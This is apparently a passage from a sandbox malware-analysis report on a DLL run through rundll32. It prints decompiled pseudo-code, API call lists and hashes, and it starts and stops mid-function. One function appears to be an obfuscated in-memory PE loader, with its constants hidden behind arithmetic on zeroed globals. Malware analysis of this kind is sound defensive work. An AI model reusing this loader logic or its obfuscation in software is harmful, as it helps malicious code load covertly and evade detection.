						_t101 =  *0x1003a6ac; // 0x20
						goto L18;
					}
				}
				return _t51 | 0xffffffff;
			}

APIs

GetStartupInfoA.KERNEL32(?), ref: 10016791
GetFileType.KERNEL32(?), ref: 1001683B
GetStdHandle.KERNEL32(-000000F6), ref: 100168BC

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: FileHandleInfoStartupType
String ID:
API String ID: 2461013171-0
Opcode ID: 39bd6c0a2537f980138bdfcda5a7014c3e9503719eba479eff4ba72a046c4577
Instruction ID: ae4eadd130dfd93b329f7a7150f3bd3cbe8e0b7cc579ad8a56df31e72a56c48d
Opcode Fuzzy Hash: 39bd6c0a2537f980138bdfcda5a7014c3e9503719eba479eff4ba72a046c4577
Instruction Fuzzy Hash: FF51D071A047428FD710CF68CC886167BE4EB0A324F298B6CD9A6CF2E2DB34D489C701

Uniqueness

Uniqueness Score: -1.00%

Function 10014B0C Relevance: 7.5, APIs: 5, Instructions: 40
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10014B0C() {
				int _t2;
				void* _t8;
				void* _t14;
				void** _t15;
				void* _t21;
				void* _t23;

				if( *0x1003b804 == 3) {
					_t8 = 0;
					_t21 =  *0x1003b7e8 - _t8; // 0x0
					if(_t21 > 0) {
						_t14 =  *0x1003b7ec; // 0x0
						_t15 = _t14 + 0xc;
						do {
							VirtualFree( *_t15, 0x100000, 0x4000);
							VirtualFree( *_t15, 0, 0x8000);
							HeapFree( *0x1003b800, 0, _t15[1]);
							_t15 =  &(_t15[5]);
							_t8 = _t8 + 1;
							_t23 = _t8 -  *0x1003b7e8; // 0x0
						} while (_t23 < 0);
					}
					HeapFree( *0x1003b800, 0,  *0x1003b7ec);
				}
				_t2 = HeapDestroy( *0x1003b800); // executed
				return _t2;
			}

APIs

VirtualFree.KERNEL32(-0000000C,00100000,00004000,00000000,?,?,?,10011847,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10014B44
VirtualFree.KERNEL32(-0000000C,00000000,00008000,?,?,10011847,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10014B4F
HeapFree.KERNEL32(00000000,?,?,?,10011847,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10014B5C
HeapFree.KERNEL32(00000000,?,?,10011847,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10014B7A
HeapDestroy.KERNELBASE(10011847,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10014B84

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Free$Heap$Virtual$Destroy
String ID:
API String ID: 782257640-0
Opcode ID: 8d09bae66a092101ec0d8536e3fd4930ca71a05d961a1cef213ae4be0d99ec9d
Instruction ID: 52ea1ed54f47cb81a6273aebdf26490cad8d7f981141f8298da11aa75090f957
Opcode Fuzzy Hash: 8d09bae66a092101ec0d8536e3fd4930ca71a05d961a1cef213ae4be0d99ec9d
Instruction Fuzzy Hash: 81F04F35544A28BFF622AF11CCC5F127BA9FB80758F224064F7452A0B6CB72A854DB58

Uniqueness

Uniqueness Score: -1.00%

Function 10004BB0 Relevance: 7.2, APIs: 4, Instructions: 1176
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E10004BB0() {
				void* __esi;
				signed int _t350;
				signed int _t380;
				void* _t398;
				signed int _t399;
				intOrPtr* _t405;
				signed int _t419;
				intOrPtr _t423;
				signed int _t435;
				void* _t440;
				signed int _t442;
				void* _t448;
				signed int _t449;
				signed int _t450;
				signed int _t460;
				void* _t464;
				signed int _t465;
				signed int _t476;
				signed int _t484;
				signed int _t491;
				void* _t503;
				signed int _t505;
				signed int _t506;
				intOrPtr _t516;
				signed int _t517;
				signed int _t525;
				signed int _t527;
				signed int _t529;
				signed int _t552;
				signed int _t557;
				void* _t562;
				signed int _t563;
				signed int _t564;
				void* _t573;
				signed int _t574;
				void* _t575;
				signed int _t576;
				void* _t577;
				signed int _t586;
				void* _t591;
				signed int _t592;
				signed int _t596;
				intOrPtr _t599;
				intOrPtr _t600;
				void* _t601;
				intOrPtr _t602;
				intOrPtr _t604;
				signed int _t605;
				signed int _t614;
				signed int _t616;
				signed int _t617;
				intOrPtr _t618;
				signed int _t619;
				signed int _t622;
				signed int _t634;
				signed int _t635;
				signed int _t636;
				signed int _t637;
				signed int _t638;
				signed int _t643;
				signed int _t644;
				intOrPtr _t652;
				signed int _t654;
				signed int _t656;
				signed int _t669;
				signed int _t670;
				signed int _t692;
				signed int _t702;
				signed int _t703;
				signed int _t714;
				signed int _t715;
				signed int _t716;
				signed int _t722;
				signed int _t744;
				signed int _t760;
				signed int _t768;
				signed int _t780;
				signed int _t790;
				signed int _t795;
				signed int _t796;
				signed int _t801;
				signed int _t802;
				signed int _t805;
				signed int _t808;
				signed int _t809;
				signed int _t819;
				signed int _t820;
				signed int _t823;
				signed int _t826;
				signed int _t827;
				intOrPtr _t831;
				signed int _t832;
				void* _t846;
				signed int _t847;
				signed int _t848;
				signed int _t851;
				signed int _t857;
				signed int _t861;
				signed int _t864;
				signed int _t871;
				signed int _t877;
				signed int _t891;
				signed int _t910;
				signed int _t917;
				signed int _t931;
				signed int _t947;
				signed int _t956;
				signed int _t957;
				signed int _t981;
				signed int _t995;
				signed int _t996;
				signed int _t997;
				signed int _t1010;
				signed int _t1011;
				signed int _t1013;
				signed int _t1014;
				signed int _t1021;
				signed int _t1050;
				signed int _t1052;
				signed int _t1054;
				signed int _t1058;
				signed int _t1063;
				signed int _t1067;
				signed int _t1068;
				signed int _t1072;
				signed int _t1073;
				signed int _t1077;
				signed int _t1083;
				signed int _t1084;
				signed int _t1085;
				signed int _t1087;
				signed int _t1088;
				signed int _t1107;
				signed int _t1114;
				signed int _t1116;
				intOrPtr _t1117;
				signed int _t1122;
				signed int _t1124;
				signed int _t1131;
				signed int _t1136;
				signed int _t1137;
				signed int _t1141;
				signed int _t1142;
				signed int _t1143;
				signed int _t1144;
				signed int _t1155;
				signed int _t1157;
				signed int _t1163;
				signed int _t1173;
				signed int _t1185;
				signed int _t1224;
				intOrPtr* _t1235;
				signed int _t1241;
				signed int _t1262;
				signed int _t1264;
				signed int _t1271;
				signed int _t1273;
				signed int _t1274;
				signed int _t1276;
				signed int _t1286;
				signed int _t1292;
				signed int _t1302;
				intOrPtr _t1310;
				signed int _t1315;
				signed int _t1350;
				void* _t1351;
				void* _t1352;
				void* _t1353;
				void* _t1354;
				void* _t1355;

				_t910 =  *0x10036118; // 0x0
				_t616 =  *0x10036114; // 0x0
				 *(_t1351 + 8) = _t616 * _t616;
				_t350 =  *0x10036110; // 0x0
				 *(_t1351 + 0x10) = _t350 * _t910;
				 *(_t1351 + 8) = _t350 + _t350 * 2;
				_t692 =  *0x10036120; // 0x0
				 *((intOrPtr*)(_t1351 + 0x20)) = _t692 + _t692 * 2;
				_t9 = _t910 + 0x3fffffff; // 0x3fffffff
				_t1114 =  *0x1003610c; // 0x0
				_t1185 =  *0x1003611c; // 0x0
				_t14 = _t1114 + 4; // 0x4
				_t917 =  *0x10036120; // 0x0
				_t1262 =  *0x10036118; // 0x0
				 *((intOrPtr*)(_t1351 + 0x18)) = 0;
				if((( *((intOrPtr*)(_t1351 + 0x14)) + 2) * _t1185 -  *((intOrPtr*)(_t1351 + 0x1c)) + 2) * _t1185 + (( *((intOrPtr*)(_t1351 + 0x14)) + 2) * _t1185 -  *((intOrPtr*)(_t1351 + 0x1c)) + 2) * _t1185 * 2 + ((3 -  *(_t1351 + 0x10)) * _t1262 + 3) * _t616 -  *(_t1351 + 0x10) +  *((intOrPtr*)(_t1351 + 0x24)) +  *((intOrPtr*)(_t1351 + 0x64)) < ((4 + _t1114 * 4) * _t692 + (_t9 * _t616 + _t1114) * 4 - _t1185 + 0xb) * _t1185 + (( ~(_t910 + _t616) << 2) - _t14 * _t350 + 4) * _t1114 + (_t616 - (_t917 << 2) + 7) *  *0x10036120 + (0x10 - _t616) * 4 - _t350 -  *0x10036118) {
					L29:
					return 0;
				} else {
					_t702 =  *0x10036120; // 0x0
					 *(_t1351 + 0x28) = _t702 * _t1262;
					_t29 = (((_t702 * _t616 * _t1185 * _t1114 - _t1262) *  *0x10036110 - _t1114 + 2) * _t616 - _t1185 +  *(_t1351 + 0x28) +  *0x10036110) * 2; // -268633797
					if(( *( *(_t1351 + 0x60)) & 0x0000ffff) != ((_t702 * _t616 * _t1185 * _t1114 - _t1262) *  *0x10036110 - _t1114 + 2) * _t616 - _t1185 +  *(_t1351 + 0x28) +  *0x10036110 + _t29 + 0x5a4d) {
						goto L29;
					} else {
						 *(_t1351 + 0x30) = ( *(_t1351 + 0x60))[0x1e];
						 *((intOrPtr*)(_t1351 + 0x20)) = _t1262 + _t1262 * 2;
						_t931 =  *0x10036110; // 0x0
						_t703 =  *0x10036110; // 0x0
						_t380 = _t1185 * _t1185;
						 *(_t1351 + 0x2c) = _t380;
						_t49 = (_t1185 * _t1114 + _t1185 * _t1114 * 2 -  *(_t1351 + 0x10) - 3) * _t616 +  *(_t1351 + 0x30) + _t380 - (_t931 + _t702 + 3) * _t702 + _t703 + (_t380 - (_t931 + _t702 + 3) * _t702 + _t703) * 2 + 0xf8; // 0x1
						_t398 = E10002560((1 - _t1114) *  *0x10036120 - _t1185 + _t1185 -  *0x10036110 - _t1262 + 2 - ( *((intOrPtr*)(_t1351 + 0x24)) + 3) * _t616 +  *((intOrPtr*)(_t1351 + 0x68)), ( *(_t1351 + 0x10) + 0xfffffff7) * _t1262 + _t49);
						_t1352 = _t1351 + 8;
						if(_t398 == 0) {
							goto L29;
						} else {
							_t399 =  *0x10036110; // 0x0
							_t947 =  *0x10036120; // 0x0
							_t405 = (4 - _t1114 * 4) *  *0x10036110 +  *((intOrPtr*)( *((intOrPtr*)(_t1352 + 0x60)) + 0x3c)) + (( *(_t1352 + 0x14) - _t399 - 2) *  *0x10036120 - _t616) * 4 +  *((intOrPtr*)(_t1352 + 0x60));
							_t714 = _t616 * _t1114;
							 *(_t1352 + 0x30) = _t714;
							_t715 =  *0x10036110; // 0x0
							 *((intOrPtr*)(_t1352 + 0x10)) = _t405;
							if( *_t405 != ((_t947 + _t714) * 0x7fffffff +  *(_t1352 + 0x2c) +  *(_t1352 + 0x1c)) * _t715 + _t616 + _t1185 + ((_t947 + _t714) * 0x7fffffff +  *(_t1352 + 0x2c) +  *(_t1352 + 0x1c)) * _t715 + _t616 + _t1185 + 0x4550) {
								goto L29;
							} else {
								_t956 =  *0x10036120; // 0x0
								_t716 = _t715 * _t956;
								_t957 = _t956 * _t1185;
								 *(_t1352 + 0x2c) = _t716;
								 *(_t1352 + 0x1c) = _t716 * _t1114;
								 *(_t1352 + 0x34) = _t957;
								if(( *(_t405 + 4) & 0x0000ffff) != _t957 -  *(_t1352 + 0x14) * _t1185 -  *(_t1352 + 0x1c) - _t1262 + _t957 -  *(_t1352 + 0x14) * _t1185 -  *(_t1352 + 0x1c) - _t1262 + 0x14c) {
									goto L29;
								} else {
									 *(_t1352 + 0x1c) =  *(_t405 + 0x38);
									_t722 =  *0x10036110; // 0x0
									if(( *(_t1352 + 0x1c) & (_t1185 + _t1185 * 0x00000002 -  *((intOrPtr*)(_t1352 + 0x20)) - 0x00000003) * _t722 + (0x00000003 -  *((intOrPtr*)(_t1352 + 0x24))) * _t1185 - (_t616 + _t616 * 0x00000002 << 0x00000001) + 0x00000001) != 0) {
										goto L29;
									} else {
										_t86 = _t1185 - 1; // -1
										 *((intOrPtr*)(_t1352 + 0x24)) = ( *( *((intOrPtr*)(_t1352 + 0x10)) + 0x14) & 0x0000ffff) + (_t86 *  *0x10036120 + (_t722 + 1) * _t616 + _t1114 + (_t86 *  *0x10036120 + (_t722 + 1) * _t616 + _t1114) * 4 << 4) +  *((intOrPtr*)(_t1352 + 0x10)) + 0x18;
										_t419 =  *0x10036120; // 0x0
										_t95 = _t419 + 2; // 0x2
										_t423 = ( *( *((intOrPtr*)(_t1352 + 0x10)) + 6) & 0x0000ffff) + ((_t419 + _t1262) * 0x7fffffff + (((_t1114 * _t1114 +  *(_t1352 + 0x34)) * _t616 + 1) * 0x7fffffff + _t1114) *  *0x10036110 - _t95 * _t1185 +  *(_t1352 + 0x30)) * 2;
										if(_t423 > 0) {
											_t1088 =  *0x10036120; // 0x0
											 *(_t1352 + 0x34) = (( *((intOrPtr*)(_t1352 + 0x28)) + _t1114) *  *0x10036110 + _t1262) * 0x7fffffff + (_t1088 * 0x7fffffff + _t1185 + 2) * _t616 + _t1185 * 2 << 1;
											 *(_t1352 + 0x14) =  *((intOrPtr*)(_t1352 + 0x24)) + 0xc;
											 *((intOrPtr*)(_t1352 + 0x24)) = _t423;
											do {
												_t600 =  *((intOrPtr*)( *(_t1352 + 0x14) + 4));
												if(_t600 != 0) {
													_t601 = _t600 + (( *(_t1352 + 0x2c) + _t1185) * 0x7fffffff + _t1114 * _t1262) * 2;
													_t891 =  *( *(_t1352 + 0x14));
												} else {
													_t1107 =  *0x10036120; // 0x0
													_t614 =  *0x10036110; // 0x0
													_t601 =  *( *(_t1352 + 0x14)) + ((_t1107 + _t1185 + _t1262) * 0x7fffffff + (( *(_t1352 + 0x2c) * _t616 * 0x7fffffff + _t1114 + 1) * _t1114 + 0x7ffffffe) * _t616 + _t614 + _t1114) * 2;
													_t891 =  *(_t1352 + 0x1c);
												}
												_t602 = _t601 + _t891;
												 *((intOrPtr*)(_t1352 + 0x28)) = _t602;
												if(_t602 >  *(_t1352 + 0x34) +  *((intOrPtr*)(_t1352 + 0x18))) {
													_t605 =  *0x10036120; // 0x0
													 *((intOrPtr*)(_t1352 + 0x18)) =  *((intOrPtr*)(_t1352 + 0x28)) + (_t1185 * 0x7fffffff + _t616 * 0x7ffffffd + _t1262 + (( *(_t1352 + 0x30) * _t1262 + 0x7fffffff) * _t605 * _t1185 + _t1114 * 0x7fffffff) * _t605 + (_t1185 + _t1114) *  *0x10036110) * 2;
												}
												_t604 =  *((intOrPtr*)(_t1352 + 0x24)) - 1;
												 *(_t1352 + 0x14) =  *(_t1352 + 0x14) + 0x28;
												 *((intOrPtr*)(_t1352 + 0x24)) = _t604;
											} while (_t604 != 0);
										}
										 *0x1003817c(_t1352 + 0x38 - (_t1185 + _t1185 * 8 << 2));
										_t1116 =  *0x10036110; // 0x0
										_t1264 =  *0x10036118; // 0x0
										_t617 =  *0x10036120; // 0x0
										 *(_t1352 + 0x14) = _t1116 *  *0x1003611c;
										 *(_t1352 + 0x30) = _t1264 + _t1264 * 2 << 1;
										_t744 =  *0x10036114; // 0x0
										 *(_t1352 + 0x34) = _t617 *  *0x1003610c;
										_t435 =  *0x1003611c; // 0x0
										_t440 = E100024F0((2 - _t1264) *  *0x1003611c - (_t1116 * _t1264 + 3) * _t1116 + _t617 * _t617 + 4 - (_t1264 + _t1264 * 2 << 1) +  *((intOrPtr*)(_t1352 + 0x3c)),  *((intOrPtr*)( *((intOrPtr*)(_t1352 + 0x10)) + 0x50)) + (_t1264 * 0x3fffffff + _t617 * 0x3ffffffe + _t435 + ((_t617 *  *0x1003610c + 0x3ffffffe) * _t435 + 2 + _t744 * 0x3fffffff) *  *0x10036114 - ( *(_t1352 + 0x14) + 1) * _t1116) * 4);
										_t981 =  *0x10036114; // 0x0
										_t760 =  *0x1003611c; // 0x0
										 *((intOrPtr*)(_t1352 + 0x20)) = _t440 + _t1116 * _t1116 + _t617 + _t981 * 2 + (_t1116 * _t1116 + _t617 + _t981 * 2) * 2 + ( *((intOrPtr*)(_t1352 + 0x18)) -  *((intOrPtr*)(_t1352 + 0x38)) + ( *((intOrPtr*)(_t1352 + 0x18)) -  *((intOrPtr*)(_t1352 + 0x38))) * 2 - 3) * _t760 -  *(_t1352 + 0x34);
										_t442 =  *0x1003610c; // 0x0
										_t448 = E100024F0((2 - _t442 + _t442) * _t1116 - _t617 + _t617 +  *((intOrPtr*)(_t1352 + 0x40)),  *(_t1352 + 0x1c) + (_t1264 * 0x7fffffff + _t1116 * 0x7ffffffe +  *0x1003611c + (_t442 * 0x7fffffff + _t760) *  *0x10036114 - (_t1116 * _t617 + 6) * _t617) * 2);
										_t1353 = _t1352 + 8;
										if( *((intOrPtr*)(_t1352 + 0x24)) != _t448) {
											goto L29;
										} else {
											_t449 =  *0x10036114; // 0x0
											_t768 = _t1116 * _t449;
											 *(_t1353 + 0x30) = _t768;
											_t995 =  *0x1003611c; // 0x0
											_t996 = _t995 *  *0x1003610c;
											_t175 = _t1264 * 0x7ffffffe - _t768 * _t449 *  *0x1003611c + 4; // 0x4
											 *(_t1353 + 0x3c) = _t996;
											_t997 =  *0x1003610c; // 0x0
											_t780 =  *0x1003610c; // 0x0
											_t180 = (_t617 * 0x7fffffff + _t1264 * _t1264 + _t449 + ((_t449 * _t449 * 0x7fffffff + _t996) * _t1116 * _t617 + _t997 * _t1264 + 1) *  *0x1003611c) * 2; // 0xffe
											_t450 =  *0x1003611c; // 0x0
											_t790 =  *0x1003610c; // 0x0
											_t184 = (_t617 * _t449 + _t1264) * 0x7fffffff + (( *(_t1353 + 0x3c) + 0x7fffffff) * _t1116 + 0x7fffffff) * _t1116 + _t450 + _t790 + 0x2000; // 0x2000
											_t191 = _t617 - 2; // -2
											_t618 =  *((intOrPtr*)(_t1353 + 0x20));
											_t1117 =  *((intOrPtr*)(_t1353 + 0x7c))((_t617 - ( *(_t1353 + 0x24) * _t790 << 1) + _t191) * _t617 + (( *((intOrPtr*)(_t1353 + 0x38)) + _t790) *  *0x10036114 - _t1264 + _t1264 + _t1116) * 2 +  *((intOrPtr*)(_t618 + 0x34)),  *((intOrPtr*)(_t1353 + 0x28)), (_t780 + _t780 + 0x00000002) * _t1116 + _t180 + 0x00001000 | (_t617 * _t449 + _t1264) * 0x7fffffff + (( *(_t1353 + 0x3c) + 0x7fffffff) * _t1116 + 0x7fffffff) * _t1116 + _t450 + _t790 + _t184, _t1264 * 0x7ffffffe - _t768 * _t449 *  *0x1003611c + _t175,  *((intOrPtr*)(_t1353 + 0x7c)));
											_t1354 = _t1353 + 0x14;
											 *((intOrPtr*)(_t1354 + 0x14)) = _t1117;
											if(_t1117 != 0) {
												L18:
												_t795 =  *0x10036120; // 0x0
												_t460 =  *0x10036114; // 0x0
												_t1010 =  *0x1003611c; // 0x0
												_t796 =  *0x10036118; // 0x0
												_t217 = _t1010 + 2; // 0x2
												_t1011 =  *0x10036110; // 0x0
												_t1224 =  *0x1003610c; // 0x0
												_t1271 =  *0x10036120; // 0x0
												_t464 = HeapAlloc(GetProcessHeap(), ((_t1011 * _t1011 + _t1011 * _t1011 + 2) *  *0x1003611c - _t1271 + _t1271) *  *0x1003611c + 8 + (_t796 * 0x7ffffffe + _t460 * 0x7fffffff + _t1011) * 2, _t1224 * _t796 + (_t460 + _t796) * _t1010 * 0x7fffffff - (_t795 * _t460 + 3) * _t795 - _t217 * _t1011 + _t460 + _t1224 * _t796 + (_t460 + _t796) * _t1010 * 0x7fffffff - (_t795 * _t460 + 3) * _t795 - _t217 * _t1011 + _t460 + 0x40);
												_t1013 =  *0x10036110; // 0x0
												_t1273 =  *0x1003611c; // 0x0
												_t465 =  *0x1003610c; // 0x0
												_t801 =  *0x10036120; // 0x0
												_t1274 =  *0x10036118; // 0x0
												_t1276 =  *0x10036114; // 0x0
												_t1235 = _t464 + ((_t465 - _t1013 * _t1013 - _t801 - _t1273 + 1) * _t1013 - _t1274 + _t1274 - _t801 + _t1276 + ((_t465 - _t1013 * _t1013 - _t801 - _t1273 + 1) * _t1013 - _t1274 + _t1274 - _t801 + _t1276) * 2 << 6);
												if(_t1235 != 0) {
													 *((intOrPtr*)(_t1235 + 4)) = _t1117;
													_t802 =  *0x10036118; // 0x0
													_t476 =  *0x1003610c; // 0x0
													_t1014 =  *0x10036110; // 0x0
													_t233 = ((_t476 * _t802 + _t1014) * _t1014 - _t802) * 2; // 0x2000
													 *((intOrPtr*)(_t1235 + 0x24)) =  *((intOrPtr*)(_t1354 + 0x70));
													asm("sbb edx, edx");
													 *((intOrPtr*)(_t1235 + 0x34)) =  *((intOrPtr*)(_t1354 + 0x7c));
													 *(_t1235 + 0x14) =  ~( ~((_t476 * _t802 + _t1014) * _t1014 - _t802 + _t233 + 0x00002000 &  *(_t618 + 0x16) & 0x0000ffff));
													 *((intOrPtr*)(_t1235 + 0x20)) =  *((intOrPtr*)(_t1354 + 0x6c));
													 *((intOrPtr*)(_t1235 + 0x2c)) =  *((intOrPtr*)(_t1354 + 0x78));
													 *((intOrPtr*)(_t1235 + 0x1c)) =  *((intOrPtr*)(_t1354 + 0x68));
													 *((intOrPtr*)(_t1235 + 0x28)) =  *((intOrPtr*)(_t1354 + 0x74));
													_t1021 =  *0x1003611c; // 0x0
													_t484 =  *0x10036110; // 0x0
													_t249 = _t484 + 1; // 0x1
													_t805 =  *0x10036114; // 0x0
													 *((intOrPtr*)(_t1235 + 0x3c)) = (_t1021 - _t249 *  *0x10036118 - 2) *  *0x10036120 - _t484 * _t1021 *  *0x1003610c *  *0x10036118 - _t805 * _t1021 *  *0x1003610c + _t805 * _t1021 + _t1021 +  *((intOrPtr*)(_t1354 + 0x3c));
													_t491 =  *0x1003610c; // 0x0
													_t619 =  *0x10036120; // 0x0
													_t1286 =  *0x10036110; // 0x0
													 *((intOrPtr*)(_t1354 + 0x30)) = _t491 + _t491 * 2;
													_t256 = _t619 - 2; // -2
													_t1122 =  *0x10036114; // 0x0
													 *((intOrPtr*)(_t1354 + 0x34)) =  *((intOrPtr*)(_t618 + 0x54));
													_t808 =  *0x1003611c; // 0x0
													_t262 = _t1286 + 3; // 0x3
													_t809 =  *0x1003610c; // 0x0
													_t503 = E10002560((_t1122 + _t262) * _t808 + _t1122 + _t809 +  *0x10036118 + ((_t1122 + _t262) * _t808 + _t1122 + _t809 +  *0x10036118) * 2 + ( *((intOrPtr*)(_t1354 + 0x34)) - _t619 * _t1122 +  *0x10036118 + (_t619 * _t1122 +  *0x10036118) * 2) * _t1286 +  *((intOrPtr*)(_t1354 + 0x68)), _t256 * _t1286 - _t619 *  *0x10036118 +  *((intOrPtr*)(_t618 + 0x54)) + _t808 + _t491);
													_t1355 = _t1354 + 8;
													if(_t503 == 0) {
														L28:
														_push(_t1235);
														E100045C0();
														goto L29;
													} else {
														_t505 =  *0x1003611c; // 0x0
														_t506 =  *0x10036118; // 0x0
														_t819 =  *0x1003611c; // 0x0
														_t271 = _t819 - 1; // -1
														_t820 =  *0x1003610c; // 0x0
														_t516 =  *((intOrPtr*)(_t1355 + 0x7c))( *((intOrPtr*)(_t1355 + 0x20)), _t1122 - (_t1286 + _t820 << 1) + (_t1122 - (_t1286 + _t820 << 1)) * 2 + ((_t1122 * _t820 - _t1286 + (_t1122 * _t820 - _t1286) * 2 - 3) * _t1286 + ( *((intOrPtr*)(_t1355 + 0x3c)) + 0xfffffffd) * _t1122 + _t619 + _t619 * 2 - 6) * _t619 +  *((intOrPtr*)(_t1355 + 0x40)), _t271 * _t1122 - _t619 - _t819 - _t506 + 0x1000, 4 + (_t1286 * _t1286 * _t505 * 0x3fffffff + _t506 + (2 - _t1122 - _t505) * _t619 + _t1122 * 2) * 4,  *((intOrPtr*)(_t1355 + 0x7c)));
														_t1124 =  *0x1003610c; // 0x0
														_t823 =  *0x10036110; // 0x0
														_t1050 =  *0x10036118; // 0x0
														 *((intOrPtr*)(_t1355 + 0x44)) = _t516;
														_t517 =  *0x10036114; // 0x0
														_t622 =  *0x10036120; // 0x0
														_t287 = _t622 * _t1124 + 1; // 0x1
														memcpy( *(_t1355 + 0x48),  *(_t1355 + 0x74), ((_t622 * _t1124 + _t287) * _t1050 + _t823 * _t517 + _t823 * _t517 + _t1050) * _t622 + (_t517 * _t1124 * 0x7fffffff + _t1050 * _t1050) * 2 +  *((intOrPtr*)( *((intOrPtr*)(_t1355 + 0x24)) + 0x54)));
														_t1052 =  *0x10036120; // 0x0
														_t826 =  *0x1003611c; // 0x0
														_t525 =  *0x1003610c; // 0x0
														_t1131 =  *0x10036118; // 0x0
														_t1292 =  *0x10036114; // 0x0
														_t827 =  *0x10036110; // 0x0
														_t527 =  *0x10036118; // 0x0
														_t831 =  *((intOrPtr*)(_t1355 + 0x50)) +  *((intOrPtr*)( *((intOrPtr*)(_t1355 + 0x80)) + 0x3c)) + (((_t1292 * _t525 - _t1052 * _t1052 * _t826 * _t525 * _t1131) * _t826 + 2) * _t826 + (_t1131 - _t827 * _t827 * _t1052 - _t1052 + 2) *  *0x10036114 + _t827 * 0x7d + _t525 * 0x7c - _t527) * 4;
														 *_t1235 = _t831;
														_t1136 =  *0x10036120; // 0x0
														_t529 =  *0x1003611c; // 0x0
														_t1054 =  *0x1003610c; // 0x0
														_t300 = _t529 + 1; // 0x1
														_t1302 =  *0x10036114; // 0x0
														_t634 =  *0x10036118; // 0x0
														 *((intOrPtr*)(_t831 + 0x34)) =  *((intOrPtr*)(_t1355 + 0x34)) + 2 + (1 - _t1054) *  *0x10036110 - (_t1136 + _t300 + _t1054) * _t529 - _t1136 - _t1302 - _t634 + _t1054;
														_t1058 =  *0x10036120; // 0x0
														_t1137 =  *0x1003611c; // 0x0
														_t635 =  *0x10036118; // 0x0
														_t832 =  *0x1003610c; // 0x0
														_t636 =  *0x10036110; // 0x0
														_t637 =  *0x10036118; // 0x0
														_t638 =  *0x10036114; // 0x0
														_push((((_t1058 * _t1137 + _t635) *  *0x10036114 - _t636 + 2) * _t1058 + (_t832 - _t1137 - 1) * _t636 + (2 - _t637) * _t638 - _t1137 + _t832 + (((_t1058 * _t1137 + _t635) *  *0x10036114 - _t636 + 2) * _t1058 + (_t832 - _t1137 - 1) * _t636 + (2 - _t637) * _t638 - _t1137 + _t832) * 2 << 6) + _t1235);
														_t552 =  *0x10036118; // 0x0
														 *(_t1355 + 0x58) = ((_t552 + _t1058) * 0x3fffffff + _t832 + 2) * _t638;
														_t557 =  *0x10036110; // 0x0
														_t1310 =  *((intOrPtr*)(_t1355 + 0x34));
														_push(_t1310);
														_push( *((intOrPtr*)(_t1355 + 0x88)) + (_t832 * 0x3fffffff +  *(_t1355 + 0x58) - (_t557 * _t1137 + _t1058 + 1) * _t1137 + _t1058) * 4);
														_push( *((intOrPtr*)(_t1355 + 0x84)));
														_t562 = E100025B0();
														_t1355 = _t1355 + 0x30;
														if(_t562 == 0) {
															goto L28;
														} else {
															_t563 =  *0x10036110; // 0x0
															_t1141 =  *0x10036120; // 0x0
															_t564 =  *0x1003611c; // 0x0
															_t846 =  *((intOrPtr*)( *_t1235 + 0x34)) - _t563 * _t1141 - _t1141 - _t1141 -  *((intOrPtr*)(_t1310 + 0x34)) + _t563 + _t563 + _t564 + _t564 + _t564;
															if(_t846 == 0) {
																 *((intOrPtr*)(_t1235 + 0x18)) = 1;
															} else {
																_t1077 = _t564 *  *0x1003610c;
																_t654 =  *0x10036114; // 0x0
																_t322 = _t654 + _t564 - 2; // -2
																_t656 =  *0x1003610c; // 0x0
																_t864 =  *0x10036110; // 0x0
																_t1163 =  *0x10036114; // 0x0
																_push((_t654 + _t564 + _t322) *  *0x10036118 + _t846 + ((2 - _t1077 + _t1077) * _t654 + 2) * _t1141 + (_t864 + _t656) * 2);
																_push(((_t1077 + 0xfffffffe) *  *0x10036118 - _t1163 << 7) + (0x80 - (_t564 << 7)) *  *0x10036120 + _t1235);
																_t591 = E10003480();
																_t1083 =  *0x1003611c; // 0x0
																_t871 =  *0x10036110; // 0x0
																_t592 =  *0x10036120; // 0x0
																_t1084 =  *0x10036114; // 0x0
																_t1085 =  *0x10036118; // 0x0
																_t1355 = _t1355 + 8;
																 *((intOrPtr*)(_t1235 + 0x18)) = (_t1083 - _t871 - _t592 - 3) * _t1083 - _t592 * _t1084 *  *0x1003610c - _t871 * _t1084 * _t1085 - _t592 - _t592 - _t1085 - _t1085 + _t591 + _t871;
															}
															_t1142 =  *0x10036120; // 0x0
															_t847 =  *0x1003610c; // 0x0
															_t1063 =  *0x10036110; // 0x0
															_t1143 =  *0x10036118; // 0x0
															_t643 =  *0x1003611c; // 0x0
															_t848 =  *0x10036114; // 0x0
															_push(((_t1142 * _t847 - _t1063) * _t1142 + (_t847 - _t1143 - 2) * _t1063 + (_t643 + _t643 - _t1143) * _t847 + (_t848 - _t1063) * _t643 - _t1143 + ((_t1142 * _t847 - _t1063) * _t1142 + (_t847 - _t1143 - 2) * _t1063 + (_t643 + _t643 - _t1143) * _t847 + (_t848 - _t1063) * _t643 - _t1143) * 2 << 6) + _t1235);
															_t573 = E10003800();
															_t1355 = _t1355 + 4;
															if(_t573 == 0) {
